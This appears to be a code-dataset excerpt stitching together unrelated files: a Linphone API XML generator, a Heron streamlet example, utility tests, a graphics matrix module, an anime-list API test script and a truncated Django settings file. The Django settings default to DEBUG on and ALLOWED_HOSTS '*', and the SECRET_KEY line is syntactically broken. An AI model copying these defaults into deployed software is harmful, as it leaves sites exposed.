is not None: self.ctype = e.associatedTypedef.name if self.ctype == 'int' and 'int' not in fullySplittedType: if fullySplittedType[-1] == '*': fullySplittedType.insert(-1, 'int') else: fullySplittedType.append('int') self.completeType = ' '.join(fullySplittedType) def __str__(self): return self.completeType + " " + self.name class CArgumentsList: def __init__(self): self.arguments = [] def addArgument(self, arg): self.arguments.append(arg) def __len__(self): return len(self.arguments) def __getitem__(self, key): return self.arguments[key] def __str__(self): argstr = [] for arg in self.arguments: argstr.append(str(arg)) return ', '.join(argstr) class CFunction(CObject): def __init__(self, name, returnarg, argslist): CObject.__init__(self, name) self.returnArgument = returnarg self.arguments = argslist self.location = None class CEvent(CFunction): pass class CProperty: def __init__(self, name): self.name = name self.getter = None self.setter = None class CClass(CObject): def __init__(self, st): CObject.__init__(self, st.associatedTypedef.name) if st.deprecated or st.associatedTypedef.deprecated: self.deprecated = True if len(st.associatedTypedef.briefDescription) > 0: self.briefDescription = st.associatedTypedef.briefDescription elif len(st.briefDescription) > 0: self.briefDescription = st.briefDescription if st.associatedTypedef.detailedDescription is not None: self.detailedDescription = st.associatedTypedef.detailedDescription elif st.detailedDescription is not None: self.detailedDescription = st.detailedDescription self.__struct = st self.events = {} self.classMethods = {} self.instanceMethods = {} self.properties = {} self.__computeCFunctionPrefix() def __computeCFunctionPrefix(self): self.cFunctionPrefix = '' first = True for l in self.name: if l.isupper() and not first: self.cFunctionPrefix += '_' self.cFunctionPrefix += l.lower() first = False self.cFunctionPrefix += '_' def __addPropertyGetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].getter = f def __addPropertySetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].setter = f def __addClassMethod(self, f): if not f.name in self.classMethods: self.classMethods[f.name] = f def __addInstanceMethod(self, f): name = f.name[len(self.cFunctionPrefix):] if name.startswith('get_') and len(f.arguments) == 1: self.__addPropertyGetter(name[4:], f) elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.startswith('set_') and len(f.arguments) == 2: self.__addPropertySetter(name[4:], f) elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t': self.__addPropertySetter(name[7:] + '_enabled', f) else: if not f.name in self.instanceMethods: self.instanceMethods[f.name] = f def addEvent(self, ev): if not ev.name in self.events: self.events[ev.name] = ev def addMethod(self, f): if len(f.arguments) > 0 and f.arguments[0].ctype == self.name: self.__addInstanceMethod(f) else: self.__addClassMethod(f) class Project: def __init__(self): self.verbose = False self.prettyPrint = False self.enums = [] self.__structs = [] self.__typedefs = [] self.__events = [] self.__functions = [] self.classes = [] self.docparser = metadoc.Parser() def add(self, elem): if isinstance(elem, CClass): if self.verbose: print("Adding class " + elem.name) self.classes.append(elem) elif isinstance(elem, CEnum): if self.verbose: print("Adding enum " + elem.name) for ev in elem.values: print("\t" + ev.name) self.enums.append(elem) elif isinstance(elem, CStruct): if self.verbose: print("Adding struct " + elem.name) for sm in elem.members: print("\t" + sm.ctype + " " + sm.name) self.__structs.append(elem) elif isinstance(elem, CTypedef): if self.verbose: print("Adding typedef " + elem.name) print("\t" + elem.definition) self.__typedefs.append(elem) elif isinstance(elem, CEvent): if self.verbose: print("Adding event " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__events.append(elem) elif isinstance(elem, CFunction): if self.verbose: print("Adding function " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__functions.append(elem) def __cleanDescription(self, descriptionNode): for para in descriptionNode.findall('./para'): for n in para.findall('./parameterlist'): para.remove(n) for n in para.findall("./simplesect[@kind='return']"): para.remove(n) for n in para.findall("./simplesect[@kind='see']"): t = ''.join(n.itertext()) n.clear() n.tag = 'see' n.text = t for n in para.findall("./simplesect[@kind='note']"): n.tag = 'note' n.attrib = {} for n in para.findall(".//xrefsect"): para.remove(n) for n in para.findall('.//ref'): n.attrib = {} for n in para.findall(".//bctbx_list"): para.remove(n) if descriptionNode.tag == 'parameterdescription': descriptionNode.tag = 'description' if descriptionNode.tag == 'simplesect': descriptionNode.tag = 'description' descriptionNode.attrib = {} return descriptionNode def __canBeWrapped(self, node): return node.find('./detaileddescription//donotwrap') is None def __discoverClasses(self): for td in self.__typedefs: if td.definition.startswith('enum '): for e in self.enums: if (e.associatedTypedef is None) and td.definition[5:] == e.name: e.associatedTypedef = td break elif td.definition.startswith('struct '): structFound = False for st in self.__structs: if (st.associatedTypedef is None) and td.definition[7:] == st.name: st.associatedTypedef = td structFound = True break if not structFound: name = td.definition[7:] print("Structure with no associated typedef: " + name) st = CStruct(name) st.associatedTypedef = td self.add(st) for td in self.__typedefs: if td.definition.startswith('struct '): for st in self.__structs: if st.associatedTypedef == td: cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(cclass) break elif ('Linphone' + td.definition) == td.name: st = CStruct(td.name) st.associatedTypedef = td cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(st) self.add(cclass) # Sort classes by length of name (longest first), so that methods are put in the right class self.classes.sort(key = lambda c: len(c.name), reverse = True) for e in self.__events: eventAdded = False for c in self.classes: if c.name.endswith('Cbs') and e.name.startswith(c.name): c.addEvent(e) eventAdded = True break if not eventAdded: for c in self.classes: if e.name.startswith(c.name): c.addEvent(e) eventAdded = True break for f in self.__functions: for c in self.classes: if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]: c.addMethod(f) break def __parseCEnumValueInitializer(self, initializer): initializer = initializer.strip() if not initializer.startswith('='): return None initializer = initializer[1:] initializer.strip() return initializer def __parseCEnumValue(self, node): ev = CEnumValue(node.find('./name').text) initializerNode = node.find('./initializer') if initializerNode is not None: ev.value = self.__parseCEnumValueInitializer(initializerNode.text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: ev.deprecated = True ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return ev def __parseCEnumMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None e = CEnum(node.find('./name').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: e.deprecated = True e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() e.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) enumvalues = node.findall("enumvalue[@prot='public']") for enumvalue in enumvalues: ev = self.__parseCEnumValue(enumvalue) e.addValue(ev) return e def __findCEnum(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']") for m in memberdefs: e = self.__parseCEnumMemberdef(m) self.add(e) def __parseCStructMember(self, node, structname): name = node.find('./name').text definition = node.find('./definition').text t = definition[0:definition.find(structname + "::" + name)] sm = CStructMember(name, t) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: sm.deprecated = True sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return sm def __parseCStructCompounddef(self, node): s = CStruct(node.find('./compoundname').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: s.deprecated = True s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() s.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']") for structmember in structmembers: sm = self.__parseCStructMember(structmember, s.name) s.addMember(sm) return s def __findCStruct(self, tree): compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']") for c in compounddefs: s = self.__parseCStructCompounddef(c) self.add(s) def __parseCTypedefMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None name = node.find('./name').text definition = node.find('./definition').text if definition.startswith('typedef '): definition = definition[8 :] if name.endswith('Cb'): pos = definition.find("(*") if pos == -1: return None returntype = definition[0:pos].strip() returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" definition = definition[pos + 2 :] pos = definition.find("(") definition = definition[pos + 1 : -1] argslist = CArgumentsList() for argdef in definition.split(', '): argType = '' starPos = argdef.rfind('*') spacePos = argdef.rfind(' ') if starPos != -1: argType = argdef[0 : starPos + 1] argName = argdef[starPos + 1 :] elif spacePos != -1: argType = argdef[0 : spacePos] argName = argdef[spacePos + 1 :] argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) f = CEvent(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return f else: pos = definition.rfind(" " + name) if pos != -1: definition = definition[0 : pos] td = CTypedef(name, definition) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: td.deprecated = True td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() td.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return td return None def __findCTypedef(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']") for m in memberdefs: td = self.__parseCTypedefMemberdef(m) self.add(td) def __parseCFunctionMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None internal = node.find("./detaileddescription/internal") if internal is not None: return None missingDocWarning = '' name = node.find('./name').text t = ''.join(node.find('./type').itertext()) returnarg = CArgument(t, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" argslist = CArgumentsList() argslistNode = node.findall('./param') for argNode in argslistNode: argType = ''.join(argNode.find('./type').itertext()) argName = '' argNameNode = argNode.find('./declname') if argNameNode is not None: argName = ''.join(argNameNode.itertext()) if argType != 'void': argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t': n = paramdesc.find('.//bctbxlist') if n is not None: arg.containedType = n.text arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; f = CFunction(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '': return None locationNode = node.find('./location') if locationNode is not None: f.location = locationNode.get('file') if not f.location.endswith('.h'): missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) return f def __findCFunction(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']") for m in memberdefs: f = self.__parseCFunctionMemberdef(m) if f is not None: self.add(f) def initFromFiles(self, xmlfiles): trees = [] for f in xmlfiles: tree = None try: if self.verbose: print("Parsing XML file: " + f.name) tree = ET.parse(f) except ET.ParseError as e: print(e) if tree is not None: trees.append(tree) for tree in trees: self.__findCEnum(tree) for tree in trees: self.__findCStruct(tree) for tree in trees: self.__findCTypedef(tree) for tree in trees: self.__findCFunction(tree) self.__discoverClasses() def initFromDir(self, xmldir): files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ] self.initFromFiles(files) def check(self): for c in self.classes: for name, p in six.iteritems(c.properties): if p.getter is None and p.setter is not None: print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter") class Generator: def __init__(self, outputfile): self.__outputfile = outputfile def __generateEnum(self, cenum, enumsNode): enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() } if cenum.associatedTypedef is not None: enumNodeAttributes['name'] = cenum.associatedTypedef.name enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes) if cenum.briefDescription != '': enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription') enumBriefDescriptionNode.text = cenum.briefDescription enumNode.append(cenum.detailedDescription) if len(cenum.values) > 0: enumValuesNode = ET.SubElement(enumNode, 'values') for value in cenum.values: enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() } valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes) if value.briefDescription != '': valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription') valueBriefDescriptionNode.text = value.briefDescription valueNode.append(value.detailedDescription) def __generateFunction(self, parentNode, nodeName, f): functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() } if f.location is not None: functionAttributes['location'] = f.location functionNode = ET.SubElement(parentNode, nodeName, functionAttributes) returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType } if f.returnArgument.containedType is not None: returnValueAttributes['containedtype'] = f.returnArgument.containedType returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes) if f.returnArgument.description is not None: returnValueNode.append(f.returnArgument.description) argumentsNode = ET.SubElement(functionNode, 'arguments') for arg in f.arguments: argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType } if arg.containedType is not None: argumentNodeAttributes['containedtype'] = arg.containedType argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes) if arg.description is not None: argumentNode.append(arg.description) if f.briefDescription != '': functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription') functionBriefDescriptionNode.text = f.briefDescription functionNode.append(f.detailedDescription) def __generateClass(self, cclass, classesNode): # Do not include classes that contain nothing if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \ len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0: return # Check the capabilities of the class has_ref_method = False has_unref_method = False has_destroy_method = False for methodname in cclass.instanceMethods: methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '') if methodname_without_prefix == 'ref': has_ref_method = True elif methodname_without_prefix == 'unref': has_unref_method = True elif methodname_without_prefix == 'destroy': has_destroy_method = True refcountable = False destroyable = False if has_ref_method and has_unref_method: refcountable = True if has_destroy_method: destroyable = True classNodeAttributes = { 'name' : cclass.name, 'cfunctionprefix' : cclass.cFunctionPrefix, 'deprecated' : str(cclass.deprecated).lower(), 'refcountable' : str(refcountable).lower(), 'destroyable' : str(destroyable).lower() } # Generate the XML node for the class classNode = ET.SubElement(classesNode, 'class', classNodeAttributes) if len(cclass.events) > 0: eventsNode = ET.SubElement(classNode, 'events') eventnames = [] for eventname in cclass.events: eventnames.append(eventname) eventnames.sort() for eventname in eventnames: self.__generateFunction(eventsNode, 'event', cclass.events[eventname]) if len(cclass.classMethods) > 0: classMethodsNode = ET.SubElement(classNode, 'classmethods') methodnames = [] for methodname in cclass.classMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname]) if len(cclass.instanceMethods) > 0: instanceMethodsNode = ET.SubElement(classNode, 'instancemethods') methodnames = [] for methodname in cclass.instanceMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname]) if len(cclass.properties) > 0: propertiesNode = ET.SubElement(classNode, 'properties') propnames = [] for propname in cclass.properties: propnames.append(propname) propnames.sort() for propname in propnames: propertyNodeAttributes = { 'name' : propname } propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes) if cclass.properties[propname].getter is not None: self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter) if cclass.properties[propname].setter is not None: self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter) if cclass.briefDescription != '': classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription') classBriefDescriptionNode.text = cclass.briefDescription classNode.append(cclass.detailedDescription) def generate(self, project): print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'") apiNode = ET.Element('api') project.enums.sort(key = lambda e: e.name) if len(project.enums) > 0: enumsNode = ET.SubElement(apiNode, 'enums') for cenum in project.enums: self.__generateEnum(cenum, enumsNode) if len(project.classes) > 0: classesNode = ET.SubElement(apiNode, 'classes') project.classes.sort(key = lambda c: c.name) for cclass in project.classes: self.__generateClass(cclass, classesNode) s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8') s += ET.tostring(apiNode, 'utf-8') if project.prettyPrint: s = minidom.parseString(s).toprettyxml(indent='\t') self.__outputfile.write(s) def main(argv = None): if argv is None: argv = sys.argv argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.") argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.") argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true') argparser.add_argument('--pretty', help="XML pretty print", action='store_true') argparser.add_argument('xmldir', help="XML directory generated by doxygen.") args = argparser.parse_args() if args.outputfile == None: args.outputfile = open('api.xml', 'w') project = Project() if args.verbose: project.verbose = True if args.pretty: project.prettyPrint = True project.initFromDir(args.xmldir) project.check() gen = Generator(args.outputfile) gen.generate(project) if __name__ == "__main__": sys.exit(main())
2.21875
2
examples/src/python/join_streamlet_topology.py
aaronstjohn/incubator-heron
2
1873
<filename>examples/src/python/join_streamlet_topology.py #!/usr/bin/env python # -*- encoding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. '''join_streamlet_topology.py: module is an example of how to use the join operator''' import sys from heronpy.streamlet.builder import Builder from heronpy.streamlet.runner import Runner from heronpy.streamlet.config import Config from heronpy.streamlet.windowconfig import WindowConfig from heronpy.connectors.mock.arraylooper import ArrayLooper # pylint: disable=superfluous-parens if __name__ == '__main__': if len(sys.argv) != 2: print("Topology's name is not specified") sys.exit(1) builder = Builder() source_1 = builder.new_source(ArrayLooper([["key1", "a"], ["key1", "b"]], sleep=1)) source_2 = builder.new_source(ArrayLooper([["key1", "c"], ["key1", "d"]], sleep=1)) source_1.join(source_2, WindowConfig.create_sliding_window(2, 1), lambda x, y: x + y).log() runner = Runner() config = Config() runner.run(sys.argv[1], config, builder)
2.0625
2
yolk/test/utils.py
yolkdata/yolk-python
0
1874
<reponame>yolkdata/yolk-python from datetime import date, datetime, timedelta from decimal import Decimal import unittest from dateutil.tz import tzutc import six from yolk import utils class TestUtils(unittest.TestCase): def test_timezone_utils(self): now = datetime.now() utcnow = datetime.now(tz=tzutc()) self.assertTrue(utils.is_naive(now)) self.assertFalse(utils.is_naive(utcnow)) fixed = utils.guess_timezone(now) self.assertFalse(utils.is_naive(fixed)) shouldnt_be_edited = utils.guess_timezone(utcnow) self.assertEqual(utcnow, shouldnt_be_edited) def test_clean(self): simple = { 'decimal': Decimal('0.142857'), 'unicode': six.u('woo'), 'date': datetime.now(), 'long': 200000000, 'integer': 1, 'float': 2.0, 'bool': True, 'str': 'woo', 'none': None } complicated = { 'exception': Exception('This should show up'), 'timedelta': timedelta(microseconds=20), 'list': [1, 2, 3] } combined = dict(simple.items()) combined.update(complicated.items()) pre_clean_keys = combined.keys() utils.clean(combined) self.assertEqual(combined.keys(), pre_clean_keys) def test_clean_with_dates(self): dict_with_dates = { 'birthdate': date(1980, 1, 1), 'registration': datetime.utcnow(), } self.assertEqual(dict_with_dates, utils.clean(dict_with_dates)) @classmethod def test_bytes(cls): if six.PY3: item = bytes(10) else: item = bytearray(10) utils.clean(item) def test_clean_fn(self): cleaned = utils.clean({'fn': lambda x: x, 'number': 4}) self.assertEqual(cleaned['number'], 4) if 'fn' in cleaned: self.assertEqual(cleaned['fn'], None) def test_remove_slash(self): self.assertEqual('http://segment.io', utils.remove_trailing_slash('http://segment.io/')) self.assertEqual('http://segment.io', utils.remove_trailing_slash('http://segment.io'))
2.59375
3
09Scan/matrix.py
kw1122/MKS66
0
1875
<reponame>kw1122/MKS66<gh_stars>0 """ A matrix will be an N sized list of 4 element lists. Each individual list will represent an [x, y, z, 1] point. For multiplication purposes, consider the lists like so: x0 x1 xn y0 y1 yn z0 z1 ... zn 1 1 1 """ import math def make_bezier(): return [ [-1, 3, -3, 1], [3, -6, 3, 0], [-3, 3, 0, 0], [1, 0, 0, 0] ] def make_hermite(): return [ [2, -3, 0, 1], [-2, 3, 0, 0], [1, -2, 1, 0], [1, -1, 0, 0] ] def generate_curve_coefs(p0, p1, p2, p3, t): coefs = [[p0, p1, p2, p3]] if t == 'hermite': curve = make_hermite() else: curve = make_bezier() matrix_mult(curve, coefs) return coefs def make_translate(x, y, z): t = new_matrix() ident(t) t[3][0] = x t[3][1] = y t[3][2] = z return t def make_scale(x, y, z): t = new_matrix() ident(t) t[0][0] = x t[1][1] = y t[2][2] = z return t def make_rotX(theta): t = new_matrix() ident(t) t[1][1] = math.cos(theta) t[2][1] = -math.sin(theta) t[1][2] = math.sin(theta) t[2][2] = math.cos(theta) return t def make_rotY(theta): t = new_matrix() ident(t) t[0][0] = math.cos(theta) t[0][2] = -math.sin(theta) t[2][0] = math.sin(theta) t[2][2] = math.cos(theta) return t def make_rotZ(theta): t = new_matrix() ident(t) t[0][0] = math.cos(theta) t[1][0] = -math.sin(theta) t[0][1] = math.sin(theta) t[1][1] = math.cos(theta) return t #print the matrix such that it looks like #the template in the top comment def print_matrix(matrix): s = '' for r in range(len(matrix[0])): for c in range(len(matrix)): s+= str(matrix[c][r]) + ' ' s += '\n' print (s) #turn the paramter matrix into an identity matrix #you may assume matrix is square def ident(matrix): for r in range(len(matrix[0])): for c in range(len(matrix)): if r == c: matrix[c][r] = 1 else: matrix[c][r] = 0 #multiply m1 by m2, modifying m2 to be the product #m1 * m2 -> m2 def matrix_mult(m1, m2): point = 0 for row in m2: #get a copy of the next point tmp = row[:] for r in range(4): m2[point][r] = (m1[0][r] * tmp[0] + m1[1][r] * tmp[1] + m1[2][r] * tmp[2] + m1[3][r] * tmp[3]) point += 1 def new_matrix(rows = 4, cols = 4): m = [] for c in range(cols): m.append([]) for r in range(rows): m[c].append(0) return m
3.53125
4
tests/test.py
Nekmo/spice
0
1876
<reponame>Nekmo/spice<gh_stars>0 from bs4 import BeautifulSoup import requests import sys, os from time import sleep sys.path.insert(0, '/home/may/Dropbox/Programming/spice/') import spice_api as spice def main(): creds = spice.load_auth_from_file('auth') print(creds) results = spice.search('Re:Zero Kara Hajimeru Isekai Seikatsu', spice.get_medium('anime'), creds) print(results[0].title) souma = spice.search_id(1, spice.get_medium('manga'), creds) print(souma.raw_data) print(souma.title) print(souma.chapters) print(souma.volumes) re_zero_data = spice.get_blank(spice.get_medium('anime')) re_zero_data.episodes = 0 re_zero_data.status = spice.get_status('reading') re_zero_data.score = 8 re_zero_data.tags = ['this the first time a show that made me cringe'] shokugeki_data = spice.get_blank(spice.get_medium('manga')) shokugeki_data.chapters = 13 shokugeki_data.volumes = 1 shokugeki_data.status = 1 shokugeki_data.score = 8 spice.update(shokugeki_data, 45757, spice.get_medium('manga'), creds) anime_list = spice.get_list(spice.get_medium('ANIME'), 'Utagai-', creds) print(anime_list.avg_score()) print(anime_list.median_score()) print(anime_list.mode_score()) print(anime_list.extremes()) print(anime_list.p_stddev()) print(anime_list.p_var()) print(anime_list.get_num_status(1)) print(anime_list.get_total()) print(anime_list.get_days()) print(anime_list.exists(11734)) print(len(anime_list.get_ids())) print(len(anime_list.get_titles())) print(anime_list.get_status(1)) print(anime_list.get_score(10)) print(anime_list.exists_as_status(11734, 1)) print(anime_list.score_diff()) anime_list2 = spice.get_list(spice.get_medium('ANIME'), 'Pickleplatter', creds) print("Similarity coefficient: {}".format(anime_list.compatibility(anime_list2))) if __name__ == '__main__': main()
2.265625
2
backend/project/settings.py
prog-serhii/MyMoney_v2
1
1877
import os from pathlib import Path from datetime import timedelta from celery.schedules import crontab from django.utils.translation import gettext_lazy as _ # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent SECRET_KEY = os.environ.get( 'SECRET_KEY', default='<KEY> ) # SECURITY WARNING: don't run with debug turned on in production! DEBUG = int(os.environ.get('DEBUG', default=1)) # 'DJANGO_ALLOWED_HOSTS' should be a single string of hosts with a space between each. # For example: 'DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1]' ALLOWED_HOSTS = os.environ.get("DJANGO_ALLOWED_HOSTS", default='*').split(" ") # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'django_filters', 'rosetta', 'djoser', 'djmoney', 'djmoney.contrib.exchange', 'corsheaders', 'apps.account.apps.AccountConfig', 'apps.transaction.apps.TransactionConfig', 'apps.common.apps.CommonConfig', 'apps.authentication.apps.AuthenticationConfig' ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware' ] ROOT_URLCONF = 'project.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages' ], }, }, ] WSGI_APPLICATION = 'project.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': os.environ.get('SQL_ENGINE', 'django.db.backends.sqlite3'), 'NAME': os.environ.get('SQL_DATABASE', os.path.join(BASE_DIR, 'db.sqlite3')), 'USER': os.environ.get('SQL_USER'), 'PASSWORD': os.environ.get('SQL_PASSWORD'), 'HOST': os.environ.get('SQL_HOST'), 'PORT': os.environ.get('SQL_PORT'), } } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] AUTH_USER_MODEL = 'authentication.User' # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'uk' LANGUAGES = [ ('en', _('English')), ('uk', _('Ukrainian')) ] LOCALE_PATHS = ( BASE_DIR / 'locale', ) TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATIC_URL = "/static/" STATIC_ROOT = os.path.join(BASE_DIR, "static") EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' # ------------------------------------------ # # django-money # # ------------------------------------------ # DEFAULT_CURRENCY = 'EUR' EXCHANGE_BACKEND = 'djmoney.contrib.exchange.backends.FixerBackend' FIXER_ACCESS_KEY = '<KEY>' # 